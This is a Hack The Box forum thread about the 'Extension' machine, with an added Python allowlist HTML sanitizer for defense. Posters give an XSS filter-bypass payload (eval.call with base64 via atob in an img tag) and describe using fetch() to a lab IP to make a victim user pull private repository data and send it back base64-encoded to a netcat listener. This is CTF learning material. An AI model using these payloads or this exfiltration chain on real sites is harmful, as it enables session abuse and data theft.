Extension - HTB [Discussion]
This is a payload which bypasses the filter:
eval.call`${"eval\x28atob`YWxlcnQoInRlc3QiKQ==`\x29"}`

Put that payload inside an img tag.

fetch() can be used here. Try fetch("http://10.10.xxx.xxx/") and you should see an incoming request from charlie.

Now let charlie request dev.snippet.htb/api/v1/users/charlie/repos and send the response back to you using fetch().then() + btoa().

In that repository is an SSH key. (Please don't post SSH keys/passwords.)
Reply
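For the defender's side of the filter discussed in the post above, here is an added example (not code from the thread or from the box): a blacklist filter that only strips the substring "src" leaves event-handler attributes in place, while an allowlist sanitizer keeps only known-safe tags, attributes and http(s) URLs. The sample issue body is constructed for the demonstration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Allowlist: permitted tags and, per tag, the attributes that may survive.
ALLOWED_TAGS = {"p": set(), "b": set(), "i": set(), "a": {"href"}, "img": {"src", "alt"}}
URL_ATTRS = {"src", "href"}
VOID_TAGS = {"img"}


def blacklist_filter(markup: str) -> str:
    """Naive filter of the kind the thread describes: remove the substring 'src'.
    Event-handler attributes such as onerror are untouched, so it is not a fix."""
    return markup.replace("src", "")


class AllowlistSanitizer(HTMLParser):
    """Rebuilds the markup keeping only allowlisted tags/attributes and http(s) URLs."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # unknown tag dropped entirely (its text content is still kept)
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag] or value is None:
                continue  # drops every on* handler and anything not allowlisted
            if name in URL_ATTRS and urlparse(value).scheme not in ("http", "https"):
                continue  # drops javascript:, data: and scheme-less values
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))  # text is re-escaped, never emitted raw


def sanitize(markup: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)


# Constructed sample issue body: a classic event-handler vector on an img tag.
SAMPLE = 'Hello <img src=x onerror="alert(1)"> <a href="javascript:alert(1)">link</a>'
```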
[quote="Exa" pid="164557" dateline="1658400336"]
This is a payload which bypasses the filter: eval.call`${"eval\x28atob`YWxlcnQoInRlc3QiKQ==`\x29"}`
Put that payload inside an img tag.
fetch() can be used here. Try fetch("http://10.10.xxx.xxx/") and you should see an incoming request from charlie.
Now let charlie request dev.snippet.htb/api/v1/users/charlie/repos and send the response back to you using fetch().then() + btoa().
In that repository is an SSH key. (Please don't post SSH keys/passwords.)
[/quote]
In dev.snippet.htb, I registered a user, logged in, and added myself as a collaborator for jean/extension via API. Since this extension is used in private repositories, I presume it is going to run in charlie's private repo. I created an issue with a body something like this: , and assigned it to Charlie. My netcat listener is not receiving anything. So I presume that Charlie is not checking issues or I am missing something here. Only after this point will I try to bypass filtering to fetch Charlie's repositories with your recommendation.
Reply
[quote="farkow" pid="164695" dateline="1658405749"]
In dev.snippet.htb, I registered a user, logged in, and added myself as a collaborator for jean/extension via API. Since this extension is used in private repositories, I presume it is going to run in charlie's private repo. I created an issue with a body something like this: , and assigned it to Charlie. My netcat listener is not receiving anything. So I presume that Charlie is not checking issues or I am missing something here. Only after this point will I try to bypass filtering to fetch Charlie's repositories with your recommendation.
[/quote]
Read inject.js. It will filter out the first as well as "src".
Reply
[quote="Exa" pid="164728" dateline="1658406930"]
[quote="farkow" pid="164695" dateline="1658405749"]
In dev.snippet.htb, I registered a user, logged in, and added myself as a collaborator for jean/extension via API. Since this extension is used in private repositories, I presume it is going to run in charlie's private repo. I created an issue with a body something like this: , and assigned it to Charlie. My netcat listener is not receiving anything. So I presume that Charlie is not checking issues or I am missing something here. Only after this point will I try to bypass filtering to fetch Charlie's repositories with your recommendation.
[/quote]
Read inject.js. It will filter out the first as well as "src".
[/quote]
Thank you! My original payload was like this: test
After it still did not work, I reset the machine, and now I got a connection. Appreciated!
Reply
Any nudge for root? Ran linpeas and checked some of the clues but failed. And also tried tunneling and scanning, too.
(I am j**n)

Currently, checking out transfer.sh
Reply
[quote="farkow" pid="165423" dateline="1658430361"]
Any nudge for root? Ran linpeas and checked some of the clues but failed. And also tried tunneling and scanning, too.
[/quote]
test
I made the payload like this and it doesn't work? Can u fix it for me?
Reply
[quote="nhocit" pid="165434" dateline="1658430771"]
test
I made the payload like this and it doesn't work? Can u fix it for me?
[/quote]
Base64 decoded it's p://10.10.14.3
I suggest you test your payloads in Firefox: F12 > Console
Reply
[quote="Exa" pid="165454" dateline="1658431583"]
[quote="nhocit" pid="165434" dateline="1658430771"]
test
I made the payload like this and it doesn't work? Can u fix it for me?
[/quote]
Base64 decoded it's p://10.10.14.3
I suggest you test your payloads in Firefox: F12 > Console
[/quote]
Yeah, or VSCode. Use the same script, make a small HTML page for yourself and see how it is reflected in the inspector and console.
Reply
Slightly stuck with these payloads. Simple stuff works. I can get a hit back: test
But I can't get a hit back with any eval payloads. I tried several of them. Also tried to escape `` with \` \`
[code]
test
test
test
test
test
[/code]
This is getting really annoying.
Reply
[quote="onl1_f4ns" pid="165976" dateline="1658454789"]
Slightly stuck with these payloads. Simple stuff works. I can get a hit back: test
But I can't get a hit back with any eval payloads. I tried several of them. Also tried to escape `` with \` \`
[code]
test
test
test
test
test
[/code]
This is getting really annoying.
[/quote]
Use this:
[code]test[/code]
Test on your Firefox console! Create an HTML file with your payload, and then open the console to see whether it works correctly! Then just create a new issue; even if the issue shows the code, it's OK. Start Netcat on your terminal, and you will see a hit back!
Reply